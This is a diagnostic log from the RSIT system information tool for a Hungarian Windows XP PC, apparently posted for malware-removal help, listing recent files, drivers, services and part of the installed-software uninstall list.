2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdro.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdpl.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz2.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz1.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcz.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\kbdcr.dll
2009-05-29 12:30:34 ----A---- C:\WINDOWS\system32\KBDAL.DLL
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\irclass.dll
2009-05-29 12:30:33 ----A---- C:\WINDOWS\system32\dgrpsetu.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\spxcoins.dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\EqnClass.Dll
2009-05-29 12:30:32 ----A---- C:\WINDOWS\system32\dgsetup.dll
2009-05-29 12:30:28 ----N---- C:\WINDOWS\system32\CONFIG.TMP
2009-05-29 12:30:28 ----A---- C:\WINDOWS\TASKMAN.EXE
2009-05-29 12:30:27 ----A---- C:\WINDOWS\system32\batt.dll
2009-05-29 12:30:27 ----A---- C:\WINDOWS\notepad.exe
2009-05-29 12:30:26 ----A---- C:\WINDOWS\system32\storprop.dll
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3D.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3C.tmp
2009-05-29 12:30:19 ----RA---- C:\WINDOWS\SET3B.tmp
2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\All Users\Application Data\desktop.ini
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET3A.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET39.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET38.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET37.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET36.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET35.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET34.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET33.tmp
2009-05-29 12:30:18 ----RA---- C:\WINDOWS\SET32.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET31.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET30.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2F.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2E.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2D.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2C.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2B.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET2A.tmp
2009-05-29 12:30:17 ----RA---- C:\WINDOWS\SET29.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET28.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET27.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET26.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET25.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET24.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET23.tmp
2009-05-29 12:30:16 ----RA---- C:\WINDOWS\SET22.tmp
2009-05-29 12:30:15 ----RA---- C:\WINDOWS\SET21.tmp
2009-05-29 12:30:12 ----RA---- C:\WINDOWS\SET8.tmp
2009-05-29 12:30:08 ----RA---- C:\WINDOWS\SET4.tmp
2009-05-29 12:30:07 ----RA---- C:\WINDOWS\SET3.tmp
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot2
2009-05-29 12:30:02 ----D---- C:\WINDOWS\system32\CatRoot
2009-05-29 12:29:57 ----SD---- C:\Documents and Settings\All Users\Application Data\Microsoft
2009-05-29 12:29:24 ----D---- C:\Documents and Settings
2009-05-29 12:28:33 ----SHD---- C:\System Volume Information
2009-05-29 12:28:33 ----SH---- C:\boot.ini
2009-05-29 12:18:18 ----RSHDC---- C:\WINDOWS\system32\dllcache
2009-05-29 12:18:18 ----RSD---- C:\WINDOWS\Fonts
2009-05-29 12:18:18 ----RD---- C:\WINDOWS\Web
2009-05-29 12:18:18 ----HD---- C:\WINDOWS\inf
2009-05-29 12:18:18 ----D---- C:\WINDOWS\WinSxS
2009-05-29 12:18:18 ----D---- C:\WINDOWS\twain_32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wins
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\wbem
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\usmt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\spool
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ShellExt
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\Setup
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ras
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\oobe
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\npp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\inetsrv
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\IME
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\icsxml
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\ias
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\export
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\drivers
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\dhcp
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3com_dmi
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\3076
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\2052
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1054
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1042
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1041
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1038
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1037
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1033
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1031
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1028
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32\1025
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system32
2009-05-29 12:18:18 ----D---- C:\WINDOWS\system
2009-05-29 12:18:18 ----D---- C:\WINDOWS\security
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Resources
2009-05-29 12:18:18 ----D---- C:\WINDOWS\repair
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Provisioning
2009-05-29 12:18:18 ----D---- C:\WINDOWS\PeerNet
2009-05-29 12:18:18 ----D---- C:\WINDOWS\pchealth
2009-05-29 12:18:18 ----D---- C:\WINDOWS\mui
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msapps
2009-05-29 12:18:18 ----D---- C:\WINDOWS\msagent
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Media
2009-05-29 12:18:18 ----D---- C:\WINDOWS\java
2009-05-29 12:18:18 ----D---- C:\WINDOWS\ime
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Help
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Driver Cache
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Debug
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Cursors
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Connection Wizard
2009-05-29 12:18:18 ----D---- C:\WINDOWS\Config
2009-05-29 12:18:18 ----D---- C:\WINDOWS\AppPatch
2009-05-29 12:18:18 ----D---- C:\WINDOWS\addins
2009-05-29 12:18:18 ----D---- C:\WINDOWS
2009-05-23 14:29:10 ----D---- C:\rsit
2009-05-23 14:29:10 ----D---- C:\Program Files\trend micro
2009-05-23 14:22:38 ----A---- C:\link.txt
2009-05-23 11:46:55 ----A---- C:\WINDOWS\ntbtlog.txt
2009-05-22 20:51:55 ----A---- C:\WINDOWS\imsins.BAK
2009-05-22 20:41:54 ----D---- C:\Program Files\NT Registry Optimizer
2009-05-22 20:40:02 ----SHD---- C:\RECYCLER
2009-05-22 20:35:17 ----SD---- C:\ComboFix
2009-05-22 18:15:45 ----D---- C:\WINDOWS\temp
2009-05-20 21:23:49 ----D---- C:\Program Files\HijackThis
2009-05-19 17:04:37 ----D---- C:\Program Files\NCH Software
2009-05-19 16:42:24 ----D---- C:\Documents and Settings\Zsombor\Application Data\NCH Swift Sound
2009-05-19 16:08:49 ----D---- C:\Program Files\NCH Swift Sound
2009-05-14 14:09:58 ----D---- C:\Program Files\Microsoft Virtual PC
2009-05-10 20:18:00 ----A---- C:\WINDOWS\system32\PY_Uninstal.exe
2009-05-05 00:31:21 ----D---- C:\Program Files\webcamXP
2009-05-05 00:30:05 ----D---- C:\Documents and Settings\All Users\Application Data\WebacamSurveyor
2009-05-05 00:29:44 ----D---- C:\Program Files\Webcam Surveyor
2009-05-05 00:14:18 ----A---- C:\WINDOWS\system32\wmvdmoe.dll
2009-05-05 00:14:13 ----D---- C:\Documents and Settings\All Users\Application Data\PY_Software
2009-05-05 00:13:52 ----D---- C:\Program Files\Active WebCam
2009-05-04 12:21:22 ----D---- C:\Program Files\Noel Danjou
2009-04-27 19:50:53 ----N---- C:\WINDOWS\NuNinst.exe
2009-04-27 19:50:51 ----D---- C:\WINDOWS\InCD
2009-04-24 19:12:43 ----A---- C:\WINDOWS\myip.ini
2009-04-24 19:03:11 ----D---- C:\Program Files\KeyFocus

======List of files/folders modified in the last 1 months======

2009-05-29 12:30:19 ----ASH---- C:\Documents and Settings\Zsombor\Application Data\desktop.ini
2009-05-23 14:29:22 ----D---- C:\WINDOWS\Internet Logs
2009-05-23 14:25:44 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-05-23 14:24:13 ----D---- C:\WINDOWS\Prefetch
2009-05-23 14:24:01 ----A---- C:\WINDOWS\wincmd.ini
2009-05-23 14:15:54 ----D---- C:\Program Files\Opera
2009-05-23 13:55:42 ----A---- C:\WINDOWS\wcx_ftp.ini
2009-05-23 10:38:30 ----D---- C:\Documents and Settings\Zsombor\Application Data\LimeWire
2009-05-22 23:29:02 ----A---- C:\WINDOWS\win.ini
2009-05-22 20:43:32 ----D---- C:\WINDOWS\system32\LogFiles
2009-05-22 20:36:39 ----D---- C:\WINDOWS\system32\Restore
2009-05-22 20:11:45 ----D---- C:\Program Files\Windows Media Player
2009-05-22 20:11:43 ----D---- C:\WINDOWS\RegisteredPackages
2009-05-22 19:54:10 ----A---- C:\checkrun.txt
2009-05-22 18:21:27 ----A---- C:\WINDOWS\system.ini
2009-05-20 21:16:59 ----HD---- C:\Config.Msi
2009-05-20 21:11:02 ----D---- C:\Program Files\Adobe
2009-05-20 20:50:53 ----D---- C:\Program Files\Common Files\Adobe
2009-05-19 21:06:37 ----D---- C:\Documents and Settings\All Users\Application Data\FLEXnet
2009-05-19 18:04:20 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-05-17 19:01:01 ----D---- C:\WINDOWS\Minidump
2009-05-14 21:30:30 ----D---- C:\WINDOWS\Registration
2009-05-14 20:15:13 ----A---- C:\WINDOWS\NeroDigital.ini
2009-05-08 22:01:34 ----A---- C:\WINDOWS\system32\DivXEncSettings.txt
2009-04-28 21:43:12 ----D---- C:\Program Files\uTorrent
2009-04-27 22:07:00 ----SD---- C:\WINDOWS\Tasks
2009-04-27 19:50:51 ----D---- C:\Program Files\Ahead

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 easdrv;easdrv; C:\WINDOWS\system32\DRIVERS\easdrv.sys [2008-10-24 53256]
R1 epfwtdir;epfwtdir; C:\WINDOWS\system32\DRIVERS\epfwtdir.sys [2008-10-24 34824]
R1 InCDPass;InCDPass; C:\WINDOWS\System32\DRIVERS\InCDPass.sys [2004-02-10 27408]
R1 intelppm;Intel processzor illesztőprogramja; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 40576]
R1 kbdhid;Billentyűzet HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14720]
R1 vmm;Virtual Machine Monitor; \??\C:\WINDOWS\system32\Drivers\vmm.sys []
R1 vsdatant;vsdatant; C:\WINDOWS\System32\vsdatant.sys [2008-08-21 353680]
R2 DLPortIO;DriverLINX Port I/O Driver; \??\C:\WINDOWS\system32\DRIVERS\DLPortIO.SYS []
R2 eamon;EAMON; C:\WINDOWS\system32\DRIVERS\eamon.sys [2008-10-24 39944]
R2 TVicPort;TVICPORT; \??\C:\WINDOWS\system32\DRIVERS\TVICPORT.SYS []
R3 ASAPIW2k;ASAPIW2K; C:\WINDOWS\system32\drivers\ASAPIW2k.sys [2005-05-26 11264]
R3 BthEnum;Bluetooth kérési blokk illesztőprogramja; C:\WINDOWS\system32\DRIVERS\BthEnum.sys [2008-04-13 17024]
R3 BthPan;Bluetooth Device (Personal Area Network); C:\WINDOWS\system32\DRIVERS\bthpan.sys [2008-04-13 101120]
R3 BTHUSB;Bluetooth-rádió USB illesztőprogramja; C:\WINDOWS\System32\Drivers\BTHUSB.sys [2008-04-13 18944]
R3 DCamUSBEMPIA;PCTV USB2 2821 Capture; C:\WINDOWS\system32\DRIVERS\emDevice.sys [2004-04-06 100957]
R3 emAudio;PCTV USB2 2821 Audio; C:\WINDOWS\system32\drivers\emAudio.sys [2004-05-05 19584]
R3 FETND5BV;VIA Rhine-Family Fast Ethernet Adapter Driver Service; C:\WINDOWS\system32\DRIVERS\fetnd5bv.sys [2005-11-16 42496]
R3 FiltUSBEMPIA;USB Device Lower Filter; C:\WINDOWS\system32\DRIVERS\emFilter.sys [2004-04-06 5245]
R3 HDAudBus;Microsoft UAA busz-illesztőprogram - High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 hidusb;Microsoft HID osztályú illesztőprogram; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RtkHDAud.sys [2006-06-28 4304384]
R3 LVUSBSta;Logitech USB Monitor Filter; C:\WINDOWS\system32\drivers\lvusbsta.sys [2005-01-31 22016]
R3 mouhid;Egér HID-illesztőprogram; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-18 12160]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-12-03 6209536]
R3 pepifilter;Volume Adapter; C:\WINDOWS\system32\DRIVERS\lv302af.sys [2005-01-31 7104]
R3 PID_08A0;QuickCam IM(PID_08A0); C:\WINDOWS\system32\DRIVERS\LV302AV.SYS [2005-01-31 912768]
R3 RFCOMM;Bluetooth-eszköz (RFCOMM protokoll TDI); C:\WINDOWS\system32\DRIVERS\rfcomm.sys [2008-04-13 59136]
R3 ScanUSBEMPIA;USB Still Image Capture Device; C:\WINDOWS\system32\DRIVERS\emScan.sys [2004-04-06 4493]
R3 SNXPCARD;Sunix PCI Multi I/O Card Driver; C:\WINDOWS\system32\DRIVERS\snxpcard.sys [2003-04-03 20864]
R3 SNXPPALX;Sunix PCI Parallel Port Driver; C:\WINDOWS\system32\DRIVERS\snxppalx.sys [2003-04-07 75264]
R3 StillCam;Still Serial digitális fényképezőgép illesztőprogramja; C:\WINDOWS\system32\DRIVERS\serscan.sys [2001-10-26 6912]
R3 usbaudio;USB audio-illesztőprogram (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
R3 usbccgp;Microsoft USB általános szülő-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
R3 usbehci;Microsoft USB 2.0 bővített állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Microsoft USB szabványos hub-illesztőprogram; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbstor;USB háttértár illesztőprogramja; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
R3 usbuhci;Microsoft USB univerzális állomásvezérlő miniport illesztőprogramja; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
R3 VPCNetS2;Virtual Machine Network Services Driver; C:\WINDOWS\system32\DRIVERS\VMNetSrv.sys [2007-01-29 59280]
R4 InCDfs;InCD File System; C:\WINDOWS\system32\drivers\InCDfs.sys [2004-02-10 94320]
S3 a6lsws87;a6lsws87; C:\WINDOWS\system32\drivers\a6lsws87.sys []
S3 Arp1394;1394 ARP ügyfélprotokoll; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
S3 BTHMODEM;Bluetooth-modem kommunikációs illesztőprogramja; C:\WINDOWS\system32\DRIVERS\bthmodem.sys [2008-04-13 37888]
S3 BTHPORT;Bluetooth-portillesztőprogram; C:\WINDOWS\System32\Drivers\BTHport.sys [2008-04-14 273408]
S3 CCDECODE;Feliratdekódoló; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
S3 FETNDIS;VIA PCI 10/100Mb Fast Ethernet adapter NT-illesztőprogramja; C:\WINDOWS\system32\DRIVERS\fetnd5.sys [2001-08-17 27165]
S3 ggflt;SEMC USB Flash Driver Filter; C:\WINDOWS\system32\DRIVERS\ggflt.sys [2009-03-01 13224]
S3 ggsemc;SEMC USB Flash Driver; C:\WINDOWS\system32\DRIVERS\ggsemc.sys [2009-03-01 24616]
S3 GT72NDISIPXP;GT 72 IP NDIS; C:\WINDOWS\system32\DRIVERS\Gt51Ip.sys [2007-07-09 95744]
S3 GT72UBUS;GT 72 U BUS; C:\WINDOWS\system32\DRIVERS\gt72ubus.sys [2007-06-26 51968]
S3 GTPTSER;GT PT SER; C:\WINDOWS\system32\DRIVERS\gtptser.sys [2007-03-30 8064]
S3 HidBth;Microsoft Bluetooth HID miniport; C:\WINDOWS\system32\DRIVERS\hidbth.sys [2008-04-14 25728]
S3 MSTEE;Microsoft Streaming Tee/Sink - Sink átalakító; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
S3 NABTSFEC;NABTS/FEC VBI kodek; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
S3 NdisIP;Microsoft TV-/videokapcsolat; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
S3 NIC1394;1394 hálózati illesztőprogram; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
S3 se45bus;Sony Ericsson Device 069 driver (WDM); C:\WINDOWS\system32\DRIVERS\se45bus.sys [2006-11-30 61536]
S3 Ser2pl;Prolific Serial port driver; C:\WINDOWS\system32\DRIVERS\ser2pl.sys [2003-07-16 43264]
S3 SIS163u;SiS163 usb Wireless LAN Adapter Driver; C:\WINDOWS\system32\DRIVERS\sis163u.sys [2005-06-20 215040]
S3 SLIP;BDA Slip De-Framer; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
S3 usbprint;Microsoft USB PRINTER osztály; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 Wdf01000;Kernel Mode Driver Frameworks service; C:\WINDOWS\System32\Drivers\wdf01000.sys [2008-03-27 503008]
S3 WSTCODEC;World Standard Teletext kodek; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-28 82944]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 BthServ;Bluetooth Support Service; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
R2 ekrn;Eset Service; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [2008-10-24 468224]
R2 GtDetectSc;GtDetectSc; C:\Program Files\T-Mobile\web'n'walk Manager\GtDetectSc.exe [2007-11-05 204915]
R2 InCDsrv;InCD Helper; C:\Program Files\Ahead\InCD\InCDsrv.exe [2004-02-10 847978]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-01-13 152984]
R2 KeyFocusWebServer;KF Web Server; C:\Program Files\KeyFocus\KFWS\bin\kfwserv.exe [2002-06-15 745472]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-12-03 163908]
R2 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2006-03-03 69632]
R2 PnkBstrA;PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [2009-02-08 66872]
R2 TestHandler;Fujitsu Siemens Computers Diagnostic Testhandler; C:\Program Files\Fujitsu Siemens Computers\SystemDiagnostics\OnlineDiagnostic\TestManager\TestHandler.exe [2008-04-25 303104]
R2 UMWdf;Windows User Mode Driver Framework; C:\WINDOWS\system32\wdfmgr.exe [2005-01-28 38912]
R2 vsmon;TrueVector Internet Monitor; C:\WINDOWS\system32\ZoneLabs\vsmon.exe [2008-08-21 2405776]
R3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; c:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
R3 usnjsvc;Messenger megosztási mappák – USN-naplóolvasó szolgáltatás; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2005-09-23 29896]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2005-09-23 66240]
S3 EhttpSrv;Eset HTTP Server; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [2008-10-24 19200]
S3 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-05-19 655624]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [2005-11-14 69632]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
S3 MSCSPTISRV;MSCSPTISRV; C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe [2006-12-14 45056]
S3 MSSQL$PINNACLESYS;MSSQL$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlservr.exe [2005-05-04 9150464]
S3 MSSQLServerADHelper;MSSQLServerADHelper; C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqladhlp.exe [2005-05-03 73728]
S3 PACSPTISVR;PACSPTISVR; C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe [2006-12-14 57344]
S3 PinnacleSys.MediaServer;Pinnacle Systems Media Service; C:\Program Files\Pinnacle\Shared Files\Programs\MediaServer\PMSHost.exe [2006-01-19 49152]
S3 SerialKeys;SerialKeys; C:\WINDOWS\system32\skeys.exe [2008-04-14 26112]
S3 SonicStage Back-End Service;SonicStage Back-End Service; C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe [2007-02-05 112184]
S3 SPTISRV;Sony SPTI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe [2006-12-14 69632]
S3 SQLAgent$PINNACLESYS;SQLAgent$PINNACLESYS; C:\Program Files\Pinnacle\MediaServer\Microsoft SQL Server\MSSQL$PINNACLESYS\Binn\sqlagent.EXE [2005-05-03 323584]
S3 SSScsiSV;SonicStage SCSI Service; C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe [2007-02-05 75320]
S3 WLSetupSvc;Windows Live Setup Service; C:\Program Files\Windows Live\installer\WLSetupSvc.exe [2007-10-25 266240]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]

-----------------EOF-----------------

info.txt:
info.txt logfile of random's system information tool 1.06 2009-05-23 14:29:26

======Uninstall list======

##CAMERADRIVERNAME##-->"C:\Program Files\Common Files\Logitech\QCDRV\BIN\SETUP.EXE" UNINSTALL REMOVEPROMPT
-->C:\Program Files\Ahead\nero\uninstall\UNNERO.exe /UNINSTALL
-->C:\WINDOWS\UNNeroVision.exe /UNINSTALL
-->Dummy
-->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf
1.11.9.0-->"C:\Program Files\MCS Electronics\BASCOM-AVR 1.11.9.0\unins000.exe"
7-Zip 4.63-->"C:\Program Files\7-Zip\Uninstall.exe"
Active WebCam Viewer-->"C:\WINDOWS\system32\PY_UNINSTAL.EXE" SOFTWARE\PySoft\Act_WebCam\Viewer
Active WebCam-->"C:\Program Files\Active WebCam\PY_UNINSTAL.EXE" SOFTWARE\PySoft\Act_WebCam
Adobe Acrobat 8 Professional - English, Français, Deutsch-->msiexec /I {AC76BA86-1033-F400-7760-000000000003}
Adobe Anchor Service CS3-->MsiExec.exe /I{90176341-0A8B-4CCC-A78D-F862228A6B95}
Adobe Asset Services CS3-->MsiExec.exe /I{6FF5DD7A-FE28-4439-B8CF-1E9AF4EA0A61}
Adobe Bridge CS3-->MsiExec.exe /I{9C9824D9-9000-4373-A6A5-D0E5D4831394}
Adobe Bridge Start Meeting-->MsiExec.exe /I{08B32819-6EEF-4057-AEDA-5AB681A36A23}
Adobe Camera Raw 4.0-->MsiExec.exe /I{B3BF6689-A81D-40D8-9A86-4AC4ACD9FC1C}
Adobe CMaps-->MsiExec.exe /I{A2B242BD-FF8D-4840-9DAA-9170EABEC59C}
Adobe Color - Photoshop Specific-->MsiExec.exe /I{A2D81E70-2A98-4A08-A628-94388B063C5E}
Adobe Color Common Settings-->MsiExec.exe /I{DADD7B8A-BCB0-44F5-967A-ECB6B4F2ECD9}
Adobe Color EU Extra Settings-->MsiExec.exe /I{51846830-E7B2-4218-8968-B77F0FF475B8}
Adobe Color EU Recommended Settings-->MsiExec.exe /I{BD087F50-46B2-43E4-BD73-5DB3DC20B47C}
Adobe Color JA Extra Settings-->MsiExec.exe /I{D92B72E2-C854-4738-8ED6-4C3661CC17AE}
Adobe Color NA Extra Settings-->MsiExec.exe /I{6179A7D2-A668-4F1D-BC9A-DCC6A10C7871}
Adobe Color NA Recommended Settings-->MsiExec.exe /I{95655ED4-7CA5-46DF-907F-7144877A32E5}
Adobe Default Language CS3-->MsiExec.exe /I{B9B35331-B7E4-4E5C-BF4C-7BC87856124D}
Adobe Device Central CS3-->MsiExec.exe /I{8D2BA474-F406-4710-9AE4-D4F22D21F0DD}
Adobe ExtendScript Toolkit 2-->MsiExec.exe /I{C2D69781-F392-4118-A5A7-C7E9C38DBFC2}
Adobe Flash CS3 Professional-->C:\Program Files\Common Files\Adobe\Installers\c3c7fe8b09d497ab2b3fd91c9353390\Setup.exe
Adobe Flash CS3-->MsiExec.exe /I{6B52140A-F189-4945-BFFC-DB3F00B8C589}
Adobe Flash Player 10 Plugin-->C:\WINDOWS\system32\Macromed\Flash\uninstall_plugin.exe
Adobe Flash Player 9 ActiveX-->MsiExec.exe /X{BC4F8E84-5E29-49EC-B4E7-E6F9CB50986C}
Adobe Flash Video Encoder-->MsiExec.exe /I{2EFFFC71-1E66-454E-A6E6-CEEC800B96D2}
Adobe Fonts All-->MsiExec.exe /I{6ABE0BEE-D572-4FE8-B434-9E72A289431B}
Adobe Help Viewer CS3-->MsiExec.exe /I{04AF207D-9A77-465A-8B76-991F6AB66245}
Adobe Linguistics CS3-->MsiExec.exe /I{54793AA1-5001-42F4-ABB6-C364617C6078}
Adobe PDF Library Files-->MsiExec.exe /I{D2559B88-CC9D-4B48-81BB-F492BAA9C48C}
Adobe Photoshop CS3-->C:\Program Files\Common Files\Adobe\Installers\6ba4f64693cf3ffde4382ffeebd542f\Setup.exe
Adobe Photoshop CS3-->MsiExec.exe /I{E66F3AFD-643B-4001-A3B3-35616CCFECEA}
Adobe Setup-->MsiExec.exe /I{6850DD2F-1DDC-4438-95DC-03CFBC0405FB}
Adobe Setup-->MsiExec.exe /I{FFC1ADE3-944B-4231-894E-3903C37271D2}
Adobe Stock Photos CS3-->MsiExec.exe /I{29E5EA97-5F74-4A57-B8B2-D4F169117183}
